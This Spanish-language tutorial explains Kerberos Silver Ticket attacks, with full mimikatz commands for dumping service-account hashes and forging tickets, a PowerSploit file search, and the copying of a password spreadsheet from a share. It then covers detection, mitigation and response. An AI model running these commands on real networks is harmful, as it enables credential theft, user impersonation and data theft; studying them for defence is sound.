Ataque de Silver Ticket

Tutorial de ataque: Cómo funciona un ataque de Silver Ticket

PASO 1

Comprometer las credenciales de una cuenta de servicio

Para obtener la capacidad de acuñar tickets TGS, un adversario primero debe comprometer el hash de contraseña de una cuenta de servicio. En este ejemplo, un adversario que ha comprometido un servidor de archivos ahora compromete el hash de contraseña de una cuenta de servicio:

      PS> .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

mimikatz(commandline) # privilege::debug

Privilege '20' OK

mimikatz(commandline) # sekurlsa::logonpasswords

# ... output truncated ... #

Authentication Id : 0 ; 29151002 (00000000:01bccf1a)

Session : Interactive from 5

User Name : DWM-5

Domain : Window Manager

Logon Server : (null)

Logon Time : 21/07/2020 10:26:16

SID : S-1-5-90-0-5

msv :

[00000003] Primary

* Username : FileServer1$

* Domain : DOMAIN

* NTLM : 281fd98680ed31a9212256ada413db50

* SHA1 : c8fe518dfa728eb92eb2566328f0123e3bcb2717

# ... output truncated ... #

mimikatz(commandline) # exit

Bye!
      

PASO 2

Forjar tickets TGS de Kerberos

Herramientas como mimikatz pueden usarse para crear Silver Tickets. El proceso para forjar tickets TGS es similar al de generar Golden Tickets, y con mimikatz se utiliza el mismo método kerberos::golden, especificando el hash de la contraseña de la cuenta de servicio en lugar del krbtgt, junto con los siguientes parámetros:

• /domain — El nombre de dominio completo del dominio de Active Directory
• /sid — El SID del dominio de Active Directory
• /usuario — El nombre de usuario a suplantar
• /target — El nombre de dominio completo del servidor
• /servicio — El nombre del servicio objetivo
• /rc4 — El hash de contraseña NTLM/RC4

      PS> .\mimikatz.exe "kerberos::golden /user:NonExistentUser /domain:domain.com /sid:S-1-5-21-5840559-2756745051-1363507867 /rc4:8fbe632c51039f92c21bcef456b31f2b /target:FileServer1.domain.com /service:cifs /ptt" "misc::cmd" exit

mimikatz(commandline) # kerberos::golden /user:NonExistentUser /domain:domain.com /sid:S-1-5-21-5840559-2756745051-1363507867 /rc4:8fbe632c51039f92c21bcef456b31f2b /target:FileServer1.domain.com /service:cifs /ptt

User : NonExistentUser

Domain : domain.com (DOMAIN)

SID : S-1-5-21-5840559-2756745051-1363507867

User Id : 500

Groups Id : *513 512 520 518 519

ServiceKey: 8fbe632c51039f92c21bcef456b31f2b - rc4_hmac_nt

Service : cifs

Target : FileServer1.domain.com

Lifetime : 27/07/2020 12:20:26 ; 25/07/2030 12:20:26 ; 25/07/2030 12:20:26

-> Ticket : ** Pass The Ticket **

* PAC generated

* PAC signed

* EncTicketPart generated

* EncTicketPart encrypted

* KrbCred generated

Golden ticket for 'NonExistentUser @ domain.com' successfully submitted for current session

mimikatz(commandline) # misc::cmd

Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF7767043B8

mimikatz(commandline) # exit

Bye!
      

PASO 3

Utiliza los boletos falsificados para alcanzar objetivos adicionales

En el paso anterior, el adversario falsificó un silver ticket e inyectó en una nueva sesión de cmd.exe. El Silver Ticket que el atacante acuñó especificaba el servicio cifs, lo que permitirá al atacante usar el TGS falsificado para acceder a los recursos compartidos de archivos. Debido a que el TGS está falsificado, se puede crear para un usuario que en realidad no existe en el dominio, dificultando así que los respondedores rastreen al adversario. En este ejemplo, el adversario utiliza el ticket falsificado y el cmdlet Find-InterestingFile del módulo de PowerShell PowerSploit para escanear el recurso compartido de archivos en busca de datos sensibles y exfiltrarlos.

      PS> Find-InterestingFile -Path \\FileServer1.domain.com\S$\shares\

FullName : \\FileServer1.domain.com\S$\shares\IT\Service Account Passwords.xlsx

Owner : DOMAIN\JOED

LastAccessTime : 27/07/2020 12:47:44

LastWriteTime : 27/07/2020 12:47:44

CreationTime : 10/04/2011 10:04:50

Length : 76859

PS> Copy-Item -Path "\\FileServer1.domain.com\S$\shares\IT\Service Account Passwords.xlsx" -Destination "C:\Windows\Temp\a20ds3"

PS>
      

Detectar, Mitigar y Responder

Detectar

Dificultad: Difícil

El proceso normal para obtener un ticket de servicio de concesión de tickets implica pedirle a un controlador de dominio que genere uno. Después de que el solicitante demuestra su identidad, el controlador de dominio responderá con un TGS cifrado con la contraseña de la cuenta de servicio. Pero debido a que el adversario ha comprometido esa contraseña, pueden crear tickets TGS sin comunicarse con el controlador de dominio. Por lo tanto, detectar Silver Tickets es posible solo en el endpoint e implica examinar los tickets TGS en busca de signos sutiles de manipulación, tales como:

• Nombres de usuario que no existen
• Membresías de grupo modificadas (agregadas o eliminadas)
• Discrepancias entre el nombre de usuario y la identificación
• Tipos de cifrado más débiles de lo normal o tiempos de vida de los tickets que exceden el máximo del dominio (el tiempo de vida predeterminado del dominio es de 10 horas; el predeterminado de mimikatz es de 10 años)

El registro de eventos de Windows tiene varios eventos de auditoría que son útiles para detectar Silver Tickets:

Evento

Fuente

Información

Auditar membresía de grupo: ID de evento 4627

Computadoras miembro

• Identificador de seguridad del usuario (SID)
• Membresías de grupo

Auditoría de inicio de sesión: ID de evento 4624

Computadoras miembro

• Identificador de seguridad del usuario (SID)
• Nombre de usuario
• IP de origen (indicando host potencialmente comprometido)

Mitigar

Dificultad: Media

Debido a que los Silver Tickets abusan del protocolo Kerberos, el riesgo de su uso no puede ser eliminado por completo. Sin embargo, existen varias mitigaciones que pueden dificultar que un adversario comprometa los hashes de contraseñas de cuentas de servicio.

• Adopte prácticas de higiene de contraseñas fuertes para las cuentas de servicio: Sus contraseñas deben generarse de manera aleatoria, tener un mínimo de 30 caracteres y cambiarse rutinariamente.
• Habilite PAC Validation. Aunque tiene limitaciones conocidas, hay algunas situaciones en las que puede ayudar con la detección y prevención de Silver tickets.
• Elimine los privilegios administrativos de los usuarios finales en las estaciones de trabajo de los miembros y adopte soluciones controladas de elevación de privilegios.
• Reduzca el acceso administrativo a estaciones de trabajo y servidores de miembros al mínimo necesario.
• Utilice soluciones como Microsoft LAPS para crear contraseñas fuertes, aleatorias y únicas para las cuentas de administrador local, y rotarlas automáticamente de manera periódica.
• Aplique las mitigaciones recomendadas para Kerberoasting.
• No permita que los usuarios posean privilegios administrativos a través de límites de seguridad. Por ejemplo, un adversario que inicialmente compromete una estación de trabajo no debería poder escalar privilegios para moverse de la estación de trabajo a un servidor o controlador de dominio.

Responder

Dificultad: Media

Si se detecta un Silver Ticket, se deben tomar las siguientes acciones de respuesta:

• Active el proceso de respuesta ante incidentes y alerte al equipo de respuesta ante incidentes.
• Ponga en cuarentena cualquier computadora implicada para actividades de investigación forense y de erradicación y recuperación.
• Restablezca la contraseña de la cuenta de servicio comprometida.